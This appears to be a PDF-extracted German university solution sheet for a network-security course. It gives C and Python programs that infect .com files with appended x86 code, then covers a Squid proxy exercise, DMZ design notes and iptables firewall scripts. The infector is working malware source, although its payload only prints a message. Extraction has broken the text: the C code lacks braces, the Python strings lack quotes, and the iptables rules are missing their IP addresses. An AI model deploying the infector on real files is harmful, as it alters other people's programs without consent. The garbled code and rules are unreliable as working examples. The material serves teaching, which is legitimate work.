Netzwerksicherheit Musterlösung Übungsblatt 5: Firewalls

Transkript

1 Institut für Informatik Philipp Hagemeister Netzwerksicherheit Musterlösung Übungsblatt 5: Firewalls 1 Virus-Konstruktion Erstellen Sie nun ein Programm in einer Programmiersprache Ihrer Wahl, welches beliebige.com-dateien mit dem in der vorherigen Aufgabe erstelltem Virus-Code infiziert. Lösung in C: #include <stdio.h> #include <string.h> #define SAVE_BYTES 3 int main(int argc, char *argv[]) { FILE *comfile; char save[save_bytes]; long filesize; int length; if(argc!= 3) { printf("usage: infect com-file message\n"); if((comfile = fopen(argv[1], "r+b")) == NULL) { printf("could not open %s\n", argv[1]); /* save first 3 bytes */ if(fread(save, sizeof(char), SAVE_BYTES, comfile)!= SAVE_BYTES) { printf("error reading file\n"); fclose(comfile); /* get file size */ fseek(comfile, 0L, SEEK_END); filesize = ftell(comfile); fseek(comfile, 0L, SEEK_SET); 1

2 /* write jmp to virus code */ putc(0xe9, comfile); putc((char)(filesize-3), comfile); putc((char)((filesize-3)>>8), comfile); fseek(comfile, 0L, SEEK_END); length = strlen(argv[2]); /* write output */ putc(0xb4, comfile); /* mov ah, 40h */ putc(0x40, comfile); putc(0xbb, comfile); /* mov bx, 1 */ putc(0x00, comfile); putc(0xb9, comfile); /* mov cx, len */ putc((char)length, comfile); putc((char)(length>>8), comfile); putc(0xba, comfile); /* mov dx, offset of message */ putc((char)(filesize ), comfile); putc((char)((filesize )>>8), comfile); putc(0xcd, comfile); /* int 21h */ putc(0x21, comfile); /* write original 3 bytes back */ putc(0xc7, comfile); /* mov word [100h], 1st & 2nd byte */ putc(0x06, comfile); putc(0x00, comfile); putc(save[0], comfile); /* <-- */ putc(save[1], comfile); /* <-- */ putc(0xc6, comfile); /* mov byte [102h], 3rd byte */ putc(0x06, comfile); putc(0x02, comfile); putc(save[2], comfile); /* <-- */ /* jmp to actual program */ putc(0xb8, comfile); /* mov ax, 100h */ putc(0x00, comfile); putc(0xff, comfile); /* jmp ax */ putc(0xe0, comfile); /* message */ if(length!= fwrite(argv[2], sizeof(char), length, comfile)) { printf("could not write virus code\n"); fclose(comfile); 2

3 fclose(comfile); return 0; Lösung in Python: #!/usr/bin/env python from future import with_statement import sys,struct,contextlib def infect(fn, msg): short = lambda num: struct.pack( <H, num) binmsg = msg.encode( utf-8 ) with contextlib.closing(open(fn, r+b )) as f: # Read first 3 bytes save = f.read(3) # Determine file size f.seek(0, 2) fsize = f.tell() f.seek(0) # jmp to end f.write( \xe9 + short(fsize-3)) # Main virus f.seek(0, 2) f.write( \xb4\x40\xbb\x01\x00\xb9 + short(len(binmsg))) f.write( \xba + short(0x100 + fsize + 29)) # address of string f.write( \xcd\x21 ) # Restore first bytes f.write( \xc7\x06\x00\x01 + save[0:2]) f.write( \xc6\x06\x02\x01 + save[2:3]) # jmp to original program f.write( \xb8\x00\x01\xff\xe0 ) # String to output f.write(binmsg) if name == main : if not (2 <= len(sys.argv) <= 3): sys.stderr.write( Usage: + sys.argv[0] + file [message]\n ) sys.exit(1) infect(sys.argv[1], Virus if len(sys.argv) < 3 else sys.argv[2]) 3

4 2 Squid Installieren Sie bei sich den HTTP-Proxy Squid. Konfigurieren Sie einen Web-Browser auf demselben Rechner so, dass er Ihren Squid als HTTP-Proxy verwendet. Geben Sie jeweils einen screenshot von Wireshark und/oder Paket-dump ab, der einen Aufruf von mit und ohne Proxy zeigt. Was sind die Unterschiede? Ohne Proxy: Nur eine Verbindung Die Anfrage wird direkt gestellt Per Konvention wird die Domain in der Anfrage weggelassen Mit Proxy: Zwei Verbindungen; eine vom lokalem Rechner zum lokalem Rechner Die gesamte URL wird in der Anfrage zum Proxy mitgeschickt, damit der Proxy die Domain kennt 4

5 3 Architektur a) Zeichnen und beschreiben Sie die Netzwerkarchitektur einer großen Universität, die aus mehreren Fakultäten besteht sowie ein VPN, DNS, Mail und mehrere Webserver anbietet. 3.1 a) Es gibt mehrere mögliche Konfigurationen, wie z.b. DMZ und Firewalls verbunden werden sollen. Ein Beispiel: b) Während eine große Universität problemlos eigene Rechner für jeden Dienst bereitstellen kann, ist dies in kleineren Organisationen nicht immer möglich. Nennen Sie Gründe und Beispiele, warum ein Dienst auf einem bestehenden Rechner/Router auf einer separierten Maschine in der DMZ in einem eigenem Netzwerk installiert werden sollte. Die Verwundbarkeit des Dienstes sollte abgeschätzt werden. Mögliche Anhaltspunkte sind Komplexität des Dienstes (z.b. Anwendungsserver relativ komplex vs. NTP relativ einfach) Programmiersprache, Programmierqualität, Sicherheitsqualität (z.b. gpsd recht sicher vs vom Praktikantem in C entwickelte Software) Erreichbarkeit des Servers. Z.B. ist ein DHCP-Server nicht ohne weiteres von außen zu kapern, ein öffentlicher Webserver ist aber vom Angreifer problemlos zu erreichen. Je nach Verwundbarkeitseinschätzung kann dann eine der obigen Optionen (weiter unten = sicherer) gewählt werden. Im allgemeinen sollte es vermieden werden, anfällige Dienste auf 5

6 einem Router oder einer Firewall zu installieren, weil diese eine Kompromittierung dann direkt den gesamten Netzwerkverkehr mitlesen / steuern kann. 4 Firewalls (a) Entwickeln Sie (zunächst ohne bestimmte Syntax, also als Beschreibung in Stichworten) Regelsätze für die beiden Stateful Firewalls. Erlaubt bei Firewall A: Pakete von außen, die zu existierenden Verbindungen gehören TCP-Verbindungen vom Web-Proxy zum Internet TCP-Verbindungen mit Zielport 25 vom Mailserver zum Internet TCP-Verbindungen mit Zielport 25 vom Internet zum Mailserver TCP-Verbindungen und UDP-Pakete mit Zielport 53 vom Mailserver oder Web-Proxy zum Internet Erlaubt bei Firewall B: Pakete von außen, die zu existierenden Verbindungen gehören TCP-Verbindungen mit Zielport 3128 von innen zum Web-Proxy TCP-Verbindungen mit Zielport 25 oder 143 von innen zum Mailserver (b) Schreiben Sie iptables-konfigurationsskripte für die FORWARD-Chains in den filter- Tables. Konfigurationsskript für Firewall A: iptables -F FORWARD iptables -P FORWARD DROP iptables -A FORWARD -m state --state INVALID -j DROP iptables -A FORWARD -m state --state ESTABLISHED -j ACCEPT # DNS von Web-Proxy und Mailserver iptables -A FORWARD -i eth1 -o eth0 -s p udp --dport 53 -j ACCEPT iptables -A FORWARD -i eth1 -o eth0 -s p tcp --dport 53 -j ACCEPT iptables -A FORWARD -i eth1 -o eth0 -s p udp --dport 53 -j ACCEPT iptables -A FORWARD -i eth1 -o eth0 -s p tcp --dport 53 -j ACCEPT # TCP vom Web-Proxy zum Internet iptables -A FORWARD -i eth1 -o eth0 -s p tcp -j ACCEPT # SMTP von Mailserver zum Intenret iptables -A FORWARD -i eth1 -o eth0 -s p tcp --dport 25 -j ACCEPT # SMTP zum Mailserver vom Internet iptables -A FORWARD -i eth0 -o eth1 -d p tcp --dport 25 -j ACCEPT 6

7 Konfigurationsskript für Firewall B: iptables -F FORWARD iptables -P FORWARD DROP iptables -A FORWARD -m state --state INVALID -j DROP iptables -A FORWARD -m state --state ESTABLISHED -j ACCEPT # Clients zu Web-Proxy iptables -A FORWARD -i eth1 -o eth0 -s /24 -d p tcp --dport j ACCEPT # SMTP und imap von den Clients zum Mailserver iptables -A FORWARD -i eth1 -o eth0 -s /24 -d p tcp \\ -m multiport --dports 25,143 -j ACCEPT 7